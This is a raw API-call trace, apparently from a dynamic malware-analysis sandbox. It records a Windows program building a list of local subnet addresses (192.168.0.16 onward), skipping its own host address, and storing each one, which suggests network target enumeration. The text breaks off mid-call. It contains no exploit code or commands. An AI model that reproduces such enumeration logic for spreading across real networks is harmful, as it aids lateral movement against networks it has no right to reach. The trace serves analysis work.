[0095.940] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.16") returned 12 [0095.940] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.16") returned 1 [0095.940] malloc (_Size=0x1c) returned 0x53fd10 [0095.940] lstrcpyA (in: lpString1=0x53fd14, lpString2="192.168.0.16" | out: lpString1="192.168.0.16") returned="192.168.0.16" [0095.940] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x53fd10 | out: ListHead=0x2064bd0, ListEntry=0x53fd10) returned 0x53fce8 [0095.940] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.17") returned 12 [0095.940] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.17") returned 1 [0095.940] malloc (_Size=0x1c) returned 0x39804d8 [0095.940] lstrcpyA (in: lpString1=0x39804dc, lpString2="192.168.0.17" | out: lpString1="192.168.0.17") returned="192.168.0.17" [0095.940] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39804d8 | out: ListHead=0x2064bd0, ListEntry=0x39804d8) returned 0x53fd10 [0095.940] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.18") returned 12 [0095.940] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.18") returned 1 [0095.940] malloc (_Size=0x1c) returned 0x3980500 [0095.940] lstrcpyA (in: lpString1=0x3980504, lpString2="192.168.0.18" | out: lpString1="192.168.0.18") returned="192.168.0.18" [0095.940] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980500 | out: ListHead=0x2064bd0, ListEntry=0x3980500) returned 0x39804d8 [0095.940] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.19") returned 12 [0095.940] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.19") returned 1 [0095.940] malloc (_Size=0x1c) returned 0x3980528 [0095.940] lstrcpyA (in: lpString1=0x398052c, lpString2="192.168.0.19" | out: lpString1="192.168.0.19") returned="192.168.0.19" [0095.940] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980528 | out: ListHead=0x2064bd0, ListEntry=0x3980528) returned 0x3980500 [0095.940] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.20") returned 12 [0095.940] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.20") returned 1 [0095.940] malloc (_Size=0x1c) returned 0x3980550 [0095.940] lstrcpyA (in: lpString1=0x3980554, lpString2="192.168.0.20" | out: lpString1="192.168.0.20") returned="192.168.0.20" [0095.940] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980550 | out: ListHead=0x2064bd0, ListEntry=0x3980550) returned 0x3980528 [0095.940] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.21") returned 12 [0095.940] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.21") returned 1 [0095.940] malloc (_Size=0x1c) returned 0x3980578 [0095.940] lstrcpyA (in: lpString1=0x398057c, lpString2="192.168.0.21" | out: lpString1="192.168.0.21") returned="192.168.0.21" [0095.940] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980578 | out: ListHead=0x2064bd0, ListEntry=0x3980578) returned 0x3980550 [0095.941] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.22") returned 12 [0095.941] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.22") returned 1 [0095.941] malloc (_Size=0x1c) returned 0x39805a0 [0095.941] lstrcpyA (in: lpString1=0x39805a4, lpString2="192.168.0.22" | out: lpString1="192.168.0.22") returned="192.168.0.22" [0095.941] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39805a0 | out: ListHead=0x2064bd0, ListEntry=0x39805a0) returned 0x3980578 [0095.941] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.23") returned 12 [0095.941] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.23") returned 1 [0095.941] malloc (_Size=0x1c) returned 0x39805c8 [0095.941] lstrcpyA (in: lpString1=0x39805cc, lpString2="192.168.0.23" | out: lpString1="192.168.0.23") returned="192.168.0.23" [0095.941] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39805c8 | out: ListHead=0x2064bd0, ListEntry=0x39805c8) returned 0x39805a0 [0095.941] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.24") returned 12 [0095.941] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.24") returned -1 [0095.941] malloc (_Size=0x1c) returned 0x39805f0 [0095.941] lstrcpyA (in: lpString1=0x39805f4, lpString2="192.168.0.24" | out: lpString1="192.168.0.24") returned="192.168.0.24" [0095.941] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39805f0 | out: ListHead=0x2064bd0, ListEntry=0x39805f0) returned 0x39805c8 [0095.941] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.25") returned 12 [0095.941] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.25") returned -1 [0095.941] malloc (_Size=0x1c) returned 0x3980618 [0095.941] lstrcpyA (in: lpString1=0x398061c, lpString2="192.168.0.25" | out: lpString1="192.168.0.25") returned="192.168.0.25" [0095.941] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980618 | out: ListHead=0x2064bd0, ListEntry=0x3980618) returned 0x39805f0 [0095.941] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.26") returned 12 [0095.941] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.26") returned -1 [0095.941] malloc (_Size=0x1c) returned 0x3980640 [0095.941] lstrcpyA (in: lpString1=0x3980644, lpString2="192.168.0.26" | out: lpString1="192.168.0.26") returned="192.168.0.26" [0095.941] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980640 | out: ListHead=0x2064bd0, ListEntry=0x3980640) returned 0x3980618 [0095.941] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.27") returned 12 [0095.941] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.27") returned -1 [0095.941] malloc (_Size=0x1c) returned 0x3980668 [0095.941] lstrcpyA (in: lpString1=0x398066c, lpString2="192.168.0.27" | out: lpString1="192.168.0.27") returned="192.168.0.27" [0095.941] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980668 | out: ListHead=0x2064bd0, ListEntry=0x3980668) returned 0x3980640 [0095.941] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.28") returned 12 [0095.941] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.28") returned -1 [0095.941] malloc (_Size=0x1c) returned 0x3980690 [0095.941] lstrcpyA (in: lpString1=0x3980694, lpString2="192.168.0.28" | out: lpString1="192.168.0.28") returned="192.168.0.28" [0095.941] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980690 | out: ListHead=0x2064bd0, ListEntry=0x3980690) returned 0x3980668 [0095.941] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.29") returned 12 [0095.942] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.29") returned -1 [0095.942] malloc (_Size=0x1c) returned 0x39806b8 [0095.942] lstrcpyA (in: lpString1=0x39806bc, lpString2="192.168.0.29" | out: lpString1="192.168.0.29") returned="192.168.0.29" [0095.942] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39806b8 | out: ListHead=0x2064bd0, ListEntry=0x39806b8) returned 0x3980690 [0095.942] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.30") returned 12 [0095.942] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.30") returned -1 [0095.942] malloc (_Size=0x1c) returned 0x39806e0 [0095.942] lstrcpyA (in: lpString1=0x39806e4, lpString2="192.168.0.30" | out: lpString1="192.168.0.30") returned="192.168.0.30" [0095.942] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39806e0 | out: ListHead=0x2064bd0, ListEntry=0x39806e0) returned 0x39806b8 [0095.942] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.31") returned 12 [0095.942] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.31") returned -1 [0095.942] malloc (_Size=0x1c) returned 0x3980708 [0095.942] lstrcpyA (in: lpString1=0x398070c, lpString2="192.168.0.31" | out: lpString1="192.168.0.31") returned="192.168.0.31" [0095.942] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980708 | out: ListHead=0x2064bd0, ListEntry=0x3980708) returned 0x39806e0 [0095.942] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.32") returned 12 [0095.942] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.32") returned -1 [0095.942] malloc (_Size=0x1c) returned 0x3980730 [0095.942] lstrcpyA (in: lpString1=0x3980734, lpString2="192.168.0.32" | out: lpString1="192.168.0.32") returned="192.168.0.32" [0095.942] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980730 | out: ListHead=0x2064bd0, ListEntry=0x3980730) returned 0x3980708 [0095.942] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.33") returned 12 [0095.942] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.33") returned -1 [0095.942] malloc (_Size=0x1c) returned 0x3980758 [0095.942] lstrcpyA (in: lpString1=0x398075c, lpString2="192.168.0.33" | out: lpString1="192.168.0.33") returned="192.168.0.33" [0095.942] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980758 | out: ListHead=0x2064bd0, ListEntry=0x3980758) returned 0x3980730 [0095.942] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.34") returned 12 [0095.942] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.34") returned -1 [0095.942] malloc (_Size=0x1c) returned 0x3980780 [0095.942] lstrcpyA (in: lpString1=0x3980784, lpString2="192.168.0.34" | out: lpString1="192.168.0.34") returned="192.168.0.34" [0095.942] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980780 | out: ListHead=0x2064bd0, ListEntry=0x3980780) returned 0x3980758 [0095.942] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.35") returned 12 [0095.942] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.35") returned -1 [0095.942] malloc (_Size=0x1c) returned 0x39807a8 [0095.942] lstrcpyA (in: lpString1=0x39807ac, lpString2="192.168.0.35" | out: lpString1="192.168.0.35") returned="192.168.0.35" [0095.942] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39807a8 | out: ListHead=0x2064bd0, ListEntry=0x39807a8) returned 0x3980780 [0095.942] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.36") returned 12 [0095.942] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.36") returned -1 [0095.943] malloc (_Size=0x1c) returned 0x39807d0 [0095.943] lstrcpyA (in: lpString1=0x39807d4, lpString2="192.168.0.36" | out: lpString1="192.168.0.36") returned="192.168.0.36" [0095.943] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39807d0 | out: ListHead=0x2064bd0, ListEntry=0x39807d0) returned 0x39807a8 [0095.943] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.37") returned 12 [0095.943] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.37") returned -1 [0095.943] malloc (_Size=0x1c) returned 0x39807f8 [0095.943] lstrcpyA (in: lpString1=0x39807fc, lpString2="192.168.0.37" | out: lpString1="192.168.0.37") returned="192.168.0.37" [0095.943] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39807f8 | out: ListHead=0x2064bd0, ListEntry=0x39807f8) returned 0x39807d0 [0095.943] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.38") returned 12 [0095.943] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.38") returned -1 [0095.943] malloc (_Size=0x1c) returned 0x3980820 [0095.943] lstrcpyA (in: lpString1=0x3980824, lpString2="192.168.0.38" | out: lpString1="192.168.0.38") returned="192.168.0.38" [0095.943] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980820 | out: ListHead=0x2064bd0, ListEntry=0x3980820) returned 0x39807f8 [0095.943] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.39") returned 12 [0095.943] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.39") returned -1 [0095.943] malloc (_Size=0x1c) returned 0x3980848 [0095.943] lstrcpyA (in: lpString1=0x398084c, lpString2="192.168.0.39" | out: lpString1="192.168.0.39") returned="192.168.0.39" [0095.943] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980848 | out: ListHead=0x2064bd0, ListEntry=0x3980848) returned 0x3980820 [0095.943] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.40") returned 12 [0095.943] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.40") returned -1 [0095.943] malloc (_Size=0x1c) returned 0x3980870 [0095.943] lstrcpyA (in: lpString1=0x3980874, lpString2="192.168.0.40" | out: lpString1="192.168.0.40") returned="192.168.0.40" [0095.943] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980870 | out: ListHead=0x2064bd0, ListEntry=0x3980870) returned 0x3980848 [0095.943] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.41") returned 12 [0095.943] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.41") returned -1 [0095.943] malloc (_Size=0x1c) returned 0x3980898 [0095.943] lstrcpyA (in: lpString1=0x398089c, lpString2="192.168.0.41" | out: lpString1="192.168.0.41") returned="192.168.0.41" [0095.943] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980898 | out: ListHead=0x2064bd0, ListEntry=0x3980898) returned 0x3980870 [0095.943] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.42") returned 12 [0095.943] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.42") returned -1 [0095.943] malloc (_Size=0x1c) returned 0x39808c0 [0095.943] lstrcpyA (in: lpString1=0x39808c4, lpString2="192.168.0.42" | out: lpString1="192.168.0.42") returned="192.168.0.42" [0095.943] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39808c0 | out: ListHead=0x2064bd0, ListEntry=0x39808c0) returned 0x3980898 [0095.943] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.43") returned 12 [0095.943] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.43") returned -1 [0095.943] malloc (_Size=0x1c) returned 0x39808e8 [0095.944] lstrcpyA (in: lpString1=0x39808ec, lpString2="192.168.0.43" | out: lpString1="192.168.0.43") returned="192.168.0.43" [0095.944] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39808e8 | out: ListHead=0x2064bd0, ListEntry=0x39808e8) returned 0x39808c0 [0095.944] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.44") returned 12 [0095.944] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.44") returned -1 [0095.944] malloc (_Size=0x1c) returned 0x3980910 [0095.944] lstrcpyA (in: lpString1=0x3980914, lpString2="192.168.0.44" | out: lpString1="192.168.0.44") returned="192.168.0.44" [0095.944] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980910 | out: ListHead=0x2064bd0, ListEntry=0x3980910) returned 0x39808e8 [0095.944] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.45") returned 12 [0095.944] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.45") returned -1 [0095.944] malloc (_Size=0x1c) returned 0x3980938 [0095.944] lstrcpyA (in: lpString1=0x398093c, lpString2="192.168.0.45" | out: lpString1="192.168.0.45") returned="192.168.0.45" [0095.944] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980938 | out: ListHead=0x2064bd0, ListEntry=0x3980938) returned 0x3980910 [0095.944] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.46") returned 12 [0095.944] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.46") returned -1 [0095.944] malloc (_Size=0x1c) returned 0x3980960 [0095.944] lstrcpyA (in: lpString1=0x3980964, lpString2="192.168.0.46" | out: lpString1="192.168.0.46") returned="192.168.0.46" [0095.944] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980960 | out: ListHead=0x2064bd0, ListEntry=0x3980960) returned 0x3980938 [0095.944] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.47") returned 12 [0095.944] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.47") returned -1 [0095.944] malloc (_Size=0x1c) returned 0x3980988 [0095.944] lstrcpyA (in: lpString1=0x398098c, lpString2="192.168.0.47" | out: lpString1="192.168.0.47") returned="192.168.0.47" [0095.944] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980988 | out: ListHead=0x2064bd0, ListEntry=0x3980988) returned 0x3980960 [0095.944] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.48") returned 12 [0095.944] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.48") returned -1 [0095.944] malloc (_Size=0x1c) returned 0x39809b0 [0095.944] lstrcpyA (in: lpString1=0x39809b4, lpString2="192.168.0.48" | out: lpString1="192.168.0.48") returned="192.168.0.48" [0095.944] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39809b0 | out: ListHead=0x2064bd0, ListEntry=0x39809b0) returned 0x3980988 [0095.944] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.49") returned 12 [0095.944] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.49") returned -1 [0095.944] malloc (_Size=0x1c) returned 0x39809d8 [0095.944] lstrcpyA (in: lpString1=0x39809dc, lpString2="192.168.0.49" | out: lpString1="192.168.0.49") returned="192.168.0.49" [0095.944] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39809d8 | out: ListHead=0x2064bd0, ListEntry=0x39809d8) returned 0x39809b0 [0095.944] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.50") returned 12 [0095.944] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.50") returned -1 [0095.944] malloc (_Size=0x1c) returned 0x3980a00 [0095.945] lstrcpyA (in: lpString1=0x3980a04, lpString2="192.168.0.50" | out: lpString1="192.168.0.50") returned="192.168.0.50" [0095.945] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980a00 | out: ListHead=0x2064bd0, ListEntry=0x3980a00) returned 0x39809d8 [0095.945] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.51") returned 12 [0095.945] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.51") returned -1 [0095.945] malloc (_Size=0x1c) returned 0x3980a28 [0095.945] lstrcpyA (in: lpString1=0x3980a2c, lpString2="192.168.0.51" | out: lpString1="192.168.0.51") returned="192.168.0.51" [0095.945] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980a28 | out: ListHead=0x2064bd0, ListEntry=0x3980a28) returned 0x3980a00 [0095.945] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.52") returned 12 [0095.945] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.52") returned -1 [0095.945] malloc (_Size=0x1c) returned 0x3980a50 [0095.945] lstrcpyA (in: lpString1=0x3980a54, lpString2="192.168.0.52" | out: lpString1="192.168.0.52") returned="192.168.0.52" [0095.945] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980a50 | out: ListHead=0x2064bd0, ListEntry=0x3980a50) returned 0x3980a28 [0095.945] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.53") returned 12 [0095.945] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.53") returned -1 [0095.945] malloc (_Size=0x1c) returned 0x3980a78 [0095.945] lstrcpyA (in: lpString1=0x3980a7c, lpString2="192.168.0.53" | out: lpString1="192.168.0.53") returned="192.168.0.53" [0095.945] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980a78 | out: ListHead=0x2064bd0, ListEntry=0x3980a78) returned 0x3980a50 [0095.945] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.54") returned 12 [0095.945] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.54") returned -1 [0095.945] malloc (_Size=0x1c) returned 0x3980aa0 [0095.945] lstrcpyA (in: lpString1=0x3980aa4, lpString2="192.168.0.54" | out: lpString1="192.168.0.54") returned="192.168.0.54" [0095.945] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980aa0 | out: ListHead=0x2064bd0, ListEntry=0x3980aa0) returned 0x3980a78 [0095.945] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.55") returned 12 [0095.945] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.55") returned -1 [0095.945] malloc (_Size=0x1c) returned 0x3980ac8 [0095.945] lstrcpyA (in: lpString1=0x3980acc, lpString2="192.168.0.55" | out: lpString1="192.168.0.55") returned="192.168.0.55" [0095.945] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980ac8 | out: ListHead=0x2064bd0, ListEntry=0x3980ac8) returned 0x3980aa0 [0095.945] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.56") returned 12 [0095.945] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.56") returned -1 [0095.945] malloc (_Size=0x1c) returned 0x3980af0 [0095.945] lstrcpyA (in: lpString1=0x3980af4, lpString2="192.168.0.56" | out: lpString1="192.168.0.56") returned="192.168.0.56" [0095.945] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980af0 | out: ListHead=0x2064bd0, ListEntry=0x3980af0) returned 0x3980ac8 [0095.945] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.57") returned 12 [0095.945] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.57") returned -1 [0095.946] malloc (_Size=0x1c) returned 0x3980b18 [0095.946] lstrcpyA (in: lpString1=0x3980b1c, lpString2="192.168.0.57" | out: lpString1="192.168.0.57") returned="192.168.0.57" [0095.946] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980b18 | out: ListHead=0x2064bd0, ListEntry=0x3980b18) returned 0x3980af0 [0095.946] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.58") returned 12 [0095.946] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.58") returned -1 [0095.946] malloc (_Size=0x1c) returned 0x3980b40 [0095.946] lstrcpyA (in: lpString1=0x3980b44, lpString2="192.168.0.58" | out: lpString1="192.168.0.58") returned="192.168.0.58" [0095.946] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980b40 | out: ListHead=0x2064bd0, ListEntry=0x3980b40) returned 0x3980b18 [0095.946] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.59") returned 12 [0095.946] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.59") returned -1 [0095.946] malloc (_Size=0x1c) returned 0x3980b68 [0095.946] lstrcpyA (in: lpString1=0x3980b6c, lpString2="192.168.0.59" | out: lpString1="192.168.0.59") returned="192.168.0.59" [0095.946] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980b68 | out: ListHead=0x2064bd0, ListEntry=0x3980b68) returned 0x3980b40 [0095.946] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.60") returned 12 [0095.946] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.60") returned -1 [0095.946] malloc (_Size=0x1c) returned 0x3980b90 [0095.946] lstrcpyA (in: lpString1=0x3980b94, lpString2="192.168.0.60" | out: lpString1="192.168.0.60") returned="192.168.0.60" [0095.946] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980b90 | out: ListHead=0x2064bd0, ListEntry=0x3980b90) returned 0x3980b68 [0095.946] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.61") returned 12 [0095.946] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.61") returned -1 [0095.946] malloc (_Size=0x1c) returned 0x3980bb8 [0095.946] lstrcpyA (in: lpString1=0x3980bbc, lpString2="192.168.0.61" | out: lpString1="192.168.0.61") returned="192.168.0.61" [0095.946] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980bb8 | out: ListHead=0x2064bd0, ListEntry=0x3980bb8) returned 0x3980b90 [0095.946] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.62") returned 12 [0095.946] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.62") returned -1 [0095.946] malloc (_Size=0x1c) returned 0x3980be0 [0095.946] lstrcpyA (in: lpString1=0x3980be4, lpString2="192.168.0.62" | out: lpString1="192.168.0.62") returned="192.168.0.62" [0095.946] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980be0 | out: ListHead=0x2064bd0, ListEntry=0x3980be0) returned 0x3980bb8 [0095.946] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.63") returned 12 [0095.946] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.63") returned -1 [0095.946] malloc (_Size=0x1c) returned 0x3980c08 [0095.946] lstrcpyA (in: lpString1=0x3980c0c, lpString2="192.168.0.63" | out: lpString1="192.168.0.63") returned="192.168.0.63" [0095.947] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980c08 | out: ListHead=0x2064bd0, ListEntry=0x3980c08) returned 0x3980be0 [0095.947] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.64") returned 12 [0095.947] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.64") returned -1 [0095.947] malloc (_Size=0x1c) returned 0x3980c30 [0095.947] lstrcpyA (in: lpString1=0x3980c34, lpString2="192.168.0.64" | out: lpString1="192.168.0.64") returned="192.168.0.64" [0095.947] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980c30 | out: ListHead=0x2064bd0, ListEntry=0x3980c30) returned 0x3980c08 [0095.947] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.65") returned 12 [0095.947] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.65") returned -1 [0095.947] malloc (_Size=0x1c) returned 0x3980c58 [0095.947] lstrcpyA (in: lpString1=0x3980c5c, lpString2="192.168.0.65" | out: lpString1="192.168.0.65") returned="192.168.0.65" [0095.947] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980c58 | out: ListHead=0x2064bd0, ListEntry=0x3980c58) returned 0x3980c30 [0095.947] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.66") returned 12 [0095.947] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.66") returned -1 [0095.947] malloc (_Size=0x1c) returned 0x3980c80 [0095.947] lstrcpyA (in: lpString1=0x3980c84, lpString2="192.168.0.66" | out: lpString1="192.168.0.66") returned="192.168.0.66" [0095.947] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980c80 | out: ListHead=0x2064bd0, ListEntry=0x3980c80) returned 0x3980c58 [0095.947] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.67") returned 12 [0095.947] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.67") returned -1 [0095.947] malloc (_Size=0x1c) returned 0x3980cd8 [0095.947] lstrcpyA (in: lpString1=0x3980cdc, lpString2="192.168.0.67" | out: lpString1="192.168.0.67") returned="192.168.0.67" [0095.947] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980cd8 | out: ListHead=0x2064bd0, ListEntry=0x3980cd8) returned 